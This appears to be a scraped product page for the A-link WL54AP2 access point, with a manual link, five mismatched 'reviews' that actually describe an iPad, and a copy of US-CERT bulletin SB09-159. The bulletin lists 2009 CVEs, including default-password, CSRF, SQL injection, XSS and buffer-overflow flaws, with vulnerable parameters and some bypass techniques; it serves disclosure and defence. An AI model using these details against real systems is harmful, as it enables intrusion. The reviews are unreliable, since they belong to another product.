A-link WL54AP2
About A-link WL54AP2
Here you can find everything about the A-link WL54AP2, such as the manual and other information. For example: reviews.
The A-link WL54AP2 manual (user guide) is ready to download for free.
At the bottom of the page users can write a review. If you own an A-link WL54AP2, please write about it to help other people.
Manual
Download: A-link WL54AP2 manual (English), size: 2.2 MB
User reviews and opinions
eduardkiefel, 6:36pm on Wednesday, October 13th, 2010:
This product is EXACTLY what I wanted. It fits perfectly and it got here very fast. The item was all that the description said it would be! I am very pleased with this product and would recommend it to friends.

csc_bd, 12:48am on Tuesday, September 28th, 2010:
PROS: OS, look, awesomeness. It's great, and the idea is well along with the OS; it's a Mac downsized. Its size is a bit big. Awesome game player, and it has replaced my laptop, but I do not have the need for business and so I do not know about how those work. Great for traveling,...

deputyvaughn, 8:08am on Wednesday, August 11th, 2010:
Bought the 16G WiFi for my wife. She enjoys playing games, surfing the web, reading books, reading email and catching up on her Soaps at ABC.com.

openofficenut, 12:11pm on Saturday, July 24th, 2010:
The iPad is exactly what I expected, easy to use, very well executed so long as you understand that it is mainly a device to consume media.

Michael Berry, 8:27pm on Thursday, March 11th, 2010:
I came into Vanns on a whim on the iPad's launch day, not really expecting to see any there still available. I replaced my first-gen iPod Touch, which I had had since they first came out a few years ago, with this new beast of a device. First of all.
Comments posted on www.ps2netdrivers.net are solely the views and opinions of the people posting them and do not necessarily reflect the views or opinions of us.
Documents

US-CERT Cyber Security Bulletin SB09-159 -- Vulnerability Summary for the Week of June 1, 2009
1/19/10 10:40 AM
National Cyber Alert System
Cyber Security Bulletin SB09-159
Vulnerability Summary for the Week of June 1, 2009
The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cyber Security Division (NCSD) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0
Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9
Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
http://www.preview.us-cert.gov/cas/bulletins/SB09-159.html

High Vulnerabilities

Each entry gives the primary vendor -- product, the CVE identifier, the published date where available, the Source & Patch Info references, and the description.

mhfmedia -- ads_pro
CVE-2008-6826 | Published: 2009-06-08 | Source & Patch Info: XF, BID, MILW0RM, SECUNIA, OSVDB
dhtml.pl in MHF Media Pro allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter, as demonstrated using the (1) advert_top.htm or (2) advert_login.htm pages.

a-link -- wl54ap2; a-link -- wl54ap3
CVE-2008-6824 | Published: 2009-06-04 | Source & Patch Info: BUGTRAQ, MISC
The management interface on the A-LINK WL54AP3 and WL54AP2 access points has a blank default password for the admin account, which makes it easier for remote attackers to obtain access.

ahmet_donmez -- webeyes_guest_book
CVE-2009-1950 | Published: 2009-06-05 | Source & Patch Info: MILW0RM, SECUNIA
SQL injection vulnerability in yorum.asp in WebEyes Guest Book 3 allows remote attackers to execute arbitrary SQL commands via the mesajid parameter.

aimp -- aimp
CVE-2009-1944 | Source & Patch Info: MISC, XF, MILW0RM, SECUNIA, OSVDB
Stack-based buffer overflow in AIMP 2.51 build 330 allows remote attackers to execute arbitrary code via an MP3 file with a long ID3 tag.

apple -- quicktime
CVE-2009-0185 | Published: 2009-06-02 | Source & Patch Info: VUPEN, CONFIRM, APPLE
Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted MS ADPCM encoded audio data in an AVI movie file.

apple -- quicktime
CVE-2009-0188 | Source & Patch Info: VUPEN, CONFIRM, APPLE
Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted movie composed of a Sorenson 3 video file.

apple -- itunes
CVE-2009-0950 | Source & Patch Info: VUPEN, BID, CONFIRM, APPLE
Stack-based buffer overflow in Apple iTunes before 8.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an itms: URL with a long URL component after a colon.

apple -- quicktime
CVE-2009-0951 | Source & Patch Info: VUPEN, CONFIRM
Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted FLC compression file.

apple -- quicktime
CVE-2009-0952 | Source & Patch Info: VUPEN, CONFIRM
Buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted compressed PSD image.

apple -- quicktime
CVE-2009-0953 | Source & Patch Info: VUPEN, CONFIRM
Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image.

apple -- quicktime
CVE-2009-0954 | Source & Patch Info: VUPEN, BID, CONFIRM, APPLE
Heap-based buffer overflow in Apple QuickTime before 7.6.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie file containing crafted Clipping Region (CRGN) atom types.

apple -- quicktime
CVE-2009-0955 | Source & Patch Info: VUPEN, BID, CONFIRM
Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted image description atoms in an Apple video file, related to a "sign extension issue."

apple -- quicktime
CVE-2009-0956 | Source & Patch Info: VUPEN, BID, CONFIRM, APPLE
Apple QuickTime before 7.6.2 does not properly initialize memory before use in handling movie files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie containing a user data atom of size zero.

apple -- quicktime
CVE-2009-0957 | Source & Patch Info: VUPEN, BID, CONFIRM, APPLE
Heap-based buffer overflow in Apple QuickTime before 7.6.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted JP2 image.

ascadnetworks -- password_protector_sd
CVE-2009-2003 | Source & Patch Info: BID, MILW0RM
Ascad Networks Password Protector SD 1.3.1 allows remote attackers to bypass authentication and gain administrative access by setting the (1) c7portal and (2) cookname cookies to "admin."

dokeos -- dokeos
CVE-2009-2004 | Source & Patch Info: VUPEN, CONFIRM
Multiple SQL injection vulnerabilities in main/mySpace/myStudents.php in Dokeos 1.8.5, and possibly earlier, allow remote attackers to execute arbitrary SQL commands via the (1) student and (2) course parameters, a different vector than CVE-2007-2902.

dokuwiki -- dokuwiki
CVE-2009-1960 | Published: 2009-06-07 | Source & Patch Info: CONFIRM
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.

gscripts -- dns_tools
CVE-2009-1916 | Source & Patch Info: BID, MILW0RM, SECUNIA
dig.php in GScripts.net DNS Tools allows remote attackers to execute arbitrary commands via shell metacharacters in the ns parameter.

ibm -- websphere_mq
CVE-2009-0896 | Published: 2009-06-03 | Source & Patch Info: VUPEN, CONFIRM
Buffer overflow in the queue manager in IBM WebSphere MQ 6.x before 6.0.2.7 and 7.x before 7.0.1.0 allows remote attackers to execute arbitrary code via a crafted request.

ibm -- websphere_application_server
CVE-2009-1899 | Source & Patch Info: VUPEN
Unspecified vulnerability in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 has unknown impact and attack vectors, related to a "security exposure in wsadmin."

ibm -- websphere_application_server
CVE-2009-1901 | Source & Patch Info: VUPEN, CONFIRM
The Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 permits "non-standard http methods," which has unknown impact and remote attack vectors.

ibm -- db2
CVE-2008-6820 | Source & Patch Info: CONFIRM, AIXAPAR, AIXAPAR, AIXAPAR, CONFIRM
The db2fmp process in IBM DB2 before FP17, 9.1 before FP5, and 9.5 before FP2 on Windows runs with "OS privilege," which has unknown impact and attack vectors, a different vulnerability than CVE-2008-3856.

ibm -- db2
CVE-2008-6821 | Source & Patch Info: CONFIRM, AIXAPAR, AIXAPAR, AIXAPAR, CONFIRM
Buffer overflow in the DAS server in IBM DB2 before FP17, 9.1 before FP5, and 9.5 before FP2 might allow attackers to execute arbitrary code or cause a denial of service (application crash) via unspecified vectors, a different vulnerability than CVE-2007-3676 and CVE-2008-3853.

ibm -- aix
CVE-2009-1954 | Source & Patch Info: BID, CONFIRM
Unspecified vulnerability in portmapper (aka portmap) in IBM AIX 5.3 allows attackers to cause a denial of service (daemon hang) via unknown vectors, related to libtli.

imagemagick -- imagemagick
CVE-2009-1882 | Source & Patch Info: VUPEN, BID, SECUNIA, OSVDB, CONFIRM, CONFIRM
Integer overflow in the XMakeImage function in magick/xwindow.c in ImageMagick 6.5.2-8 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted TIFF file, which triggers a buffer overflow. NOTE: some of these details are obtained from third party information.

intel -- e1000; linux -- kernel
CVE-2009-1385 | Source & Patch Info: CONFIRM, CONFIRM, CONFIRM
Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size.

joomlame -- com_agoragroup
CVE-2009-1848 | Published: 2009-06-01 | Source & Patch Info: BID, MILW0RM
SQL injection vulnerability in the JoomlaMe AgoraGroups (aka AG or com_agoragroup) component 0.3.5.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a groupdetail action to index.php.

modsecurity -- modsecurity
CVE-2009-1902 | Source & Patch Info: FEDORA
The multipart processor in ModSecurity before 2.5.9 allows remote attackers to cause a denial of service (crash) via a multipart form datapost request with a missing part header name, which triggers a NULL pointer dereference.

modsecurity -- modsecurity
CVE-2009-1903 | Source & Patch Info: FEDORA, FEDORA, FEDORA, VUPEN
The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.

newearthpt -- imguoload
CVE-2008-6822 | Source & Patch Info: XF, BID, MILW0RM, SECUNIA, OSVDB
Unrestricted file upload vulnerability in uploadp.php in New Earth Programming Team (NEPT) imgupload (aka Image Uploader) 1.0 allows remote attackers to execute arbitrary code by uploading a file with an executable extension and a modified content type, then accessing this file via a direct request, as demonstrated by an upload with an image/jpeg content type. NOTE: some of these details are obtained from third party information.

newsboard -- unclassified_newsboard
CVE-2009-1947 | Published: 2009-06-05 | Source & Patch Info: XF, BID, MILW0RM, SECUNIA
SQL injection vulnerability in the UnbDbEncode function in unb_lib/database.lib.php in Unclassified NewsBoard (UNB) 1.6.4 allows remote attackers to execute arbitrary SQL commands via the Query parameter in a search action to forum.php, a different vector than CVE-2005-3686.

openskip -- skip
CVE-2009-1909 | Published: 2009-06-04 | Source & Patch Info: JVN
SQL injection vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.

rafal_kucharski -- rtwebalbum
CVE-2009-1910 | Source & Patch Info: XF, BID, BUGTRAQ, MILW0RM, SECUNIA, CONFIRM, CONFIRM
SQL injection vulnerability in index.php in RTWebalbum 1.0.462 allows remote attackers to execute arbitrary SQL commands via the AlbumId parameter.

safenet -- softremote; safenet -- softremote1.4
CVE-2009-1943 | Source & Patch Info: XF, MISC, VUPEN, SECTRACK, BID, BUGTRAQ, SECUNIA, OSVDB
Stack-based buffer overflow in the IKE service (ireIke.exe) in SafeNet SoftRemote before 10.8.6 allows remote attackers to execute arbitrary code via a long request to UDP port 62514.

tzo -- webcal
CVE-2009-1945 | Source & Patch Info: XF, MILW0RM
SQL injection vulnerability in webCal3_detail.asp in WebCal 3.04 allows remote attackers to execute arbitrary SQL commands via the event_id parameter.

unclassified -- newsboard
CVE-2009-1949 | Source & Patch Info: XF, BID, MILW0RM
import_wbb1.php in Unclassified NewsBoard (UNB) 1.6.4 allows remote attackers to obtain sensitive information via a direct request, which reveals the installation path in an error message.

xvid -- xvid
CVE-2009-0893 | Published: 2009-06-02 | Source & Patch Info: CONFIRM
Multiple heap-based buffer overflows in xvidcore/src/decoder.c in the xvidcore library in Xvid before 1.2.2, as used by Windows Media Player and other applications, allow remote attackers to execute arbitrary code by providing a crafted macroblock (aka MBlock) number in a video stream in a crafted movie file that triggers heap memory corruption, related to a "missing resync marker range check" and the (1) decoder_iframe, (2) decoder_pframe, and (3) decoder_bframe functions.

xvid -- xvid
CVE-2009-0894 | Source & Patch Info: CONFIRM, CONFIRM
Heap-based buffer overflow in the decoder_create function in the initialization functionality in xvidcore/src/decoder.c in Xvid before 1.2.2, as used by Windows Media Player and other applications, allows remote attackers to execute arbitrary code via vectors involving the DirectShow (aka DShow) frontend and improper handling of the XVID_ERR_MEMORY return code during processing of a crafted movie file. NOTE: some of these details are obtained from third party information.

Medium Vulnerabilities

a-link -- wl54ap2; a-link -- wl54ap3
CVE-2008-6823 | Source & Patch Info: MISC
Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface on the A-LINK WL54AP3 and WL54AP2 access points before firmware 1.4.2-eng1 allow remote attackers to hijack the authentication of administrators for requests that (1) modify the network configuration via certain parameters to goform/formWanTcpipSetup or (2) modify credentials via certain parameters to goform/formPasswordSetup.

adaptbb -- adaptbb
CVE-2009-1946 | Source & Patch Info: XF, MILW0RM, SECUNIA, OSVDB
PHP remote file inclusion vulnerability in latestposts.php in AdaptBB 1.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the forumspath parameter.

apache -- tomcat
CVE-2009-0033 | Published: 2009-06-05 | Source & Patch Info: VUPEN, BID, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.

apache -- tomcat
CVE-2009-0580 | Source & Patch Info: VUPEN, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM, CONFIRM
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.

apache -- apr-util
CVE-2009-0023 | Published: 2009-06-07 | Source & Patch Info: CONFIRM, DEBIAN
The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, related to an "underflow flaw."

apache -- apr-util; apache -- http_server
CVE-2009-1955 | Source & Patch Info: DEBIAN, DEBIAN, CONFIRM, MLIST
The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.

apache -- apr-util
CVE-2009-1956 | Source & Patch Info: CONFIRM, MLIST, CONFIRM
Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.

apple -- mac_os_x; apple -- mac_os_x_server
CVE-2009-1717 | Source & Patch Info: BID, BUGTRAQ, CONFIRM, SECTRACK
Integer overflow in Terminal in Apple Mac OS X 10.5 before 10.5.7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted size value in a CSI[4 xterm resize escape sequence that triggers a heap-based buffer overflow.

atlassian -- jira
CVE-2008-6831 | Source & Patch Info: CONFIRM
Multiple cross-site scripting (XSS) vulnerabilities in Atlassian JIRA Enterprise Edition 3.13 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname (Full Name) parameter in the ViewProfile page or (2) returnUrl parameter in a form, as demonstrated using secure/AddComment!default.jspa (aka "Add Comment").

atlassian -- jira
CVE-2008-6832 | Source & Patch Info: XF, BID, SECUNIA, OSVDB
Cross-site request forgery (CSRF) vulnerability in Atlassian JIRA Enterprise Edition 3.13 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

cisco -- ironport_email_security_appliances; cisco -- ironport_asyncos
CVE-2009-1162 | Published: 2009-06-05 | Source & Patch Info: SECTRACK, BID, CONFIRM, SECUNIA
Cross-site scripting (XSS) vulnerability in the Spam Quarantine login page in Cisco IronPort AsyncOS before 6.5.2 on Series C, M, and X appliances allows remote attackers to inject arbitrary web script or HTML via the referrer parameter.

citrix -- web_interface
CVE-2008-6830 | Source & Patch Info: VUPEN, CONFIRM, OSVDB
The disconnection feature in Citrix Web Interface 5.0 and 5.0.1 for Java Application Servers does not properly terminate a user's web interface session, which allows attackers with access to the same browser instance to gain access to the user's Web Interface session. NOTE: the attacker must also have valid credentials to the Web Interface.

claroline -- claroline
CVE-2009-1907 | Source & Patch Info: BID, CONFIRM
Cross-site scripting (XSS) vulnerability in claroline/linker/notfound.php in Claroline 1.8.11 allows remote attackers to inject arbitrary web script or HTML via the Referer HTTP header.

claudio_klingler -- quixplorer; tinywebgallery -- tinywebgallery
CVE-2009-1911 | Published: 2009-06-04 | Source & Patch Info: BID
Directory traversal vulnerability in _include/init.php (aka admin/_include/init.php) in QuiXplorer 2.3.2 and earlier, as used in TinyWebGallery (TWG) 1.7.6 and earlier, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to admin/index.php.

cpcommerce -- cpcommerce
CVE-2009-1936 | Source & Patch Info: MILW0RM, SECUNIA
_functions.php in cpCommerce 1.2.x, possibly including 1.2.9, sends a redirect but does not exit when it is called directly, which allows remote attackers to bypass a protection mechanism to conduct remote file inclusion and directory traversal attacks, or execute arbitrary PHP code or read arbitrary files, via the GLOBALS[prefix] parameter, a different vector than CVE-2003-1500.

dokeos -- dokeos
CVE-2009-2005 | Source & Patch Info: VUPEN, CONFIRM
Cross-site request forgery (CSRF) vulnerability in Dokeos 1.8.5, and possibly earlier, allows remote attackers to hijack the authentication of unspecified victims and add new personal agenda items via unknown vectors.

dokeos -- dokeos
CVE-2009-2007 | Published: 2009-06-08 | Source & Patch Info: VUPEN, CONFIRM
Multiple directory traversal vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to (1) read portions of arbitrary files via a .. (dot dot) and a ..\ (dot dot backslash) in the lang parameter to main/exercice/hotspot_lang_conversion.php and (2) read arbitrary files via a .. (dot dot) in the doc_url parameter to main/exercice/Hpdownload.php.

dokeos -- dokeos
CVE-2009-2008 | Source & Patch Info: VUPEN, CONFIRM
Multiple SQL injection vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to execute arbitrary SQL commands via the (1) uInfo parameter to main/tracking/userLog.php and the (2) course parameter to main/mySpace/lp_tracking.php, a different vector than CVE-2009-2006.

dokeos -- dokeos
CVE-2009-2009 | Source & Patch Info: VUPEN, CONFIRM
Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) curdirpath parameter to main/document/slideshow.php and the (2) file parameter to main/exercice/testheaderpage.php.

gstreamer -- good_plug-ins
CVE-2009-1932 | Source & Patch Info: BID, SECUNIA, OSVDB, CONFIRM
Multiple integer overflows in the (1) user_info_callback, (2) user_endrow_callback, and (3) gst_pngdec_task functions (ext/libpng/gstpngdec.c) in GStreamer Good Plug-ins (aka gst-plugins-good or gstreamer-plugins-good) 0.10.15 allow remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted PNG file, which triggers a buffer overflow.

haudenschilt -- family_connections_cms
CVE-2009-2010 | Source & Patch Info: VUPEN, BID, BUGTRAQ, MILW0RM, SECUNIA
Multiple SQL injection vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 1.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) thread parameter to messageboard.php, (2) member parameter to profile.php, (3) pid parameter to gallery/index.php, and the (4) fcms_login_id cookie parameter.

hp -- discovery&dependency_mapping_inventory
CVE-2009-1419 | Source & Patch Info: HP, HP
Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.0.0 through 2.52, 7.50, and 7.51 on Windows allows remote attackers to access DDMI agents via unknown vectors.

ibm -- intregrated_solutions_console; ibm -- websphere_application_server; ibm -- websphere_portal
CVE-2009-0899 | Source & Patch Info: CONFIRM
IBM WebSphere Application Server (WAS) 6.1 through 6.1.0.24 and 7.0 through 7.0.0.4, IBM WebSphere Portal Server 5.1 through 6.0, and IBM Integrated Solutions Console (ISC) 6.0.1 do not properly set the IsSecurityEnabled security flag during migration of WebSphere Member Manager (WMM) to Virtual Member Manager (VMM) and a Federated Repository, which allows attackers to obtain sensitive information from repositories via unspecified vectors.

ibm -- websphere_application_server
CVE-2009-1898 | Source & Patch Info: VUPEN, CONFIRM
The secure login page in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 does not redirect to an https page upon receiving an http request, which makes it easier for remote attackers to read the contents of WAS sessions by sniffing the network.

ibm -- websphere_application_server
CVE-2009-1900 | Source & Patch Info: VUPEN, CONFIRM
The Configservice APIs in the Administrative Console component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 allow attackers to obtain sensitive information via unspecified vectors.

ibm -- db2
CVE-2008-2154 | Source & Patch Info: CONFIRM, AIXAPAR, AIXAPAR, CONFIRM
IBM DB2 before FP17, 9.1 before FP5, and 9.5 before FP2 provides an INSTALL_JAR (aka sqlj.install_jar) procedure, which allows remote authenticated users to create or overwrite arbitrary files via unspecified calls.

ibm -- db2
CVE-2009-1906 | Published: 2009-06-03 | Source & Patch Info: CONFIRM, AIXAPAR, AIXAPAR
The DRDA Services component in IBM DB2 9.1 before FP7 and 9.5 before FP4 allows remote attackers to cause a denial of service (memory corruption and application crash) via an IPv6 address in the correlation token in the APPID string, as demonstrated by an APPID string sent by the third-party DataDirect JDBC driver 3.7.32.

ibm -- filenet_content_manager; ibm -- websphere_application_server; oracle -- weblogic_application_server
CVE-2009-1953 | Published: 2009-06-07 | Source & Patch Info: BID, CONFIRM, SECUNIA
IBM FileNet Content Manager 4.0, 4.0.1, and 4.5, as used in IBM WebSphere Application Server (WAS) and Oracle BEA WebLogic Application Server, when the CE Web Services listener has a certain WSEAF configuration, does not properly restrict use of a cached Subject, which allows remote attackers to obtain access with the credentials of a recently authenticated user via unspecified vectors.

icq -- icq
CVE-2009-1915 | Published: 2009-06-04 | Source & Patch Info: XF, BID, BUGTRAQ, MILW0RM
Stack-based buffer overflow in the URL Search Hook (ICQToolBar.dll) in ICQ 6.5 allows remote attackers to cause a denial of service (persistent crash) and possibly execute arbitrary code via an Internet shortcut .URL file containing a long URL parameter, which triggers a crash when browsing a folder that contains this file.

irssi -- irssi
CVE-2009-1959 | Source & Patch Info: MISC, MLIST, CONFIRM, CONFIRM
Off-by-one error in the event_wallops function in fe-common/irc/fe-events.c in irssi 0.8.13 allows remote IRC servers to cause a denial of service (crash) via an empty command, which triggers a one-byte buffer under-read and a one-byte buffer underflow.

joomla -- joomla
CVE-2009-1938 | Source & Patch Info: BID
Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to database output and the frontend administrative panel.

joomla -- ja_purity
CVE-2009-1939 | Source & Patch Info: XF, BID, SECUNIA, OSVDB, CONFIRM
Cross-site scripting (XSS) vulnerability in the JA_Purity template for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

joomla -- joomla
CVE-2009-1940 | Source & Patch Info: BID, OSVDB, CONFIRM
Cross-site scripting (XSS) vulnerability in the administrator panel in the com_users core component for Joomla! 1.5.x through 1.5.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

lightneasy -- lightneasy
CVE-2009-1937 | Published: 2009-06-05 | Source & Patch Info: BID, BUGTRAQ, SECUNIA, MISC
Cross-site scripting (XSS) vulnerability in the comment posting feature in LightNEasy 2.2.1 "no database" (aka flat) and 2.2.2 SQLite allows remote attackers to inject arbitrary web script or HTML via the (1) commentname (aka Author), (2) commentemail (aka Email), and (3) commentmessage (aka Comment) parameters. NOTE: some of these details are obtained from third party information.

linux -- kernel
CVE-2009-1914 | Source & Patch Info: MLIST, CONFIRM, CONFIRM
The pci_register_iommu_region function in arch/sparc/kernel/pci_common.c in the Linux kernel before 2.6.29 on the sparc64 platform allows local users to cause a denial of service (system crash) by reading the /proc/iomem file, related to uninitialized pointers and the request_resource function.

luxbum -- luxbum
CVE-2009-1913 | Source & Patch Info: XF, VUPEN, BID, MILW0RM, SECUNIA
SQL injection vulnerability in manager.php in LuxBum 0.5.5, when magic_quotes_gpc is disabled and dotclear authentication is used, allows remote attackers to execute arbitrary SQL commands via the username parameter in a login action.

mt312 -- img-bbs
CVE-2009-1881 | Source & Patch Info: SECUNIA, OSVDB, JVNDB, JVN
Cross-site scripting (XSS) vulnerability in MT312 IMG-BBS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to model.php with a timestamp before 20090521.

openskip -- skip
CVE-2009-1908 | Source & Patch Info: BID, SECUNIA, CONFIRM, JVNDB, JVN, CONFIRM
Cross-site scripting (XSS) vulnerability in Skip 1.0.2 and earlier, and 1.1RC2 and earlier 1.1RC versions, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

openssl -- openssl; openssl_project -- openssl; redhat -- openssl
CVE-2009-1386 | Source & Patch Info: CONFIRM
ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello.

openssl -- openssl; openssl_project -- openssl; redhat -- openssl
CVE-2009-1387 | Source & Patch Info: CONFIRM, CONFIRM, CONFIRM
The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a "fragment bug."

phpeasycode -- pad_site_scripts
CVE-2009-1941 | Source & Patch Info: XF, MILW0RM
PAD Site Scripts 3.6 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for dbbackup.txt.

propertymaxpro -- propertymax_pro_free
CVE-2009-1951 | Source & Patch Info: MILW0RM, SECUNIA
Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.

propertymaxpro -- propertymax_pro_free
CVE-2009-1952 | Published: 2009-06-05 | Source & Patch Info: MILW0RM, SECUNIA
Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.

strongswan -- strongswan
CVE-2009-1957 | Source & Patch Info: CONFIRM, CONFIRM
charon/sa/ike_sa.c in the charon daemon in strongSWAN before 4.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an invalid IKE_SA_INIT request that triggers "an incomplete state," followed by a CREATE_CHILD_SA request.

strongswan -- strongswan
CVE-2009-1958 | Source & Patch Info: CONFIRM, CONFIRM
charon/sa/tasks/child_create.c in the charon daemon in strongSWAN before 4.3.1 switches the NULL checks for TSi and TSr payloads, which allows remote attackers to cause a denial of service via an IKE_AUTH request without a (1) TSi or (2) TSr traffic selector.

sun -- opensolaris; sun -- solaris
CVE-2009-1933 | Published: 2009-06-05 | Source & Patch Info: SUNALERT, CONFIRM
Kerberos in Sun Solaris 8, 9, and 10, and OpenSolaris before snv_117, does not properly manage credential caches, which allows local users to access Kerberized NFS mount points and Kerberized NFS shares via unspecified vectors.

sun -- java_system_web_server; sun -- one_web_server
CVE-2009-1934 | Source & Patch Info: SUNALERT, CONFIRM
Cross-site scripting (XSS) vulnerability in the Reverse Proxy Plug-in in Sun Java System Web Server 6.1 before SP11 allows remote attackers to inject arbitrary web script or HTML via the query string in situations that result in a 502 Gateway error.

symantec -- altiris_deployment_solution; symantec -- altiris_notification_server
CVE-2008-6827 | Source & Patch Info: VUPEN, CONFIRM, MISC
The ListView control in the Client GUI (AClient.exe) in Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 allows local users to gain SYSTEM privileges and execute arbitrary commands via a "Shatter" style attack on the "command prompt" hidden GUI button to (1) overwrite the CommandLine parameter to cmd.exe to use SYSTEM privileges and (2) modify the DLL that is loaded using the LoadLibrary API function.

symantec -- altiris_deployment_solution
CVE-2008-6828 | Source & Patch Info: VUPEN, CONFIRM
Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 stores the Application Identity Account password in memory in cleartext, which allows local users to gain privileges and modify clients of the Deployment Solution Server.

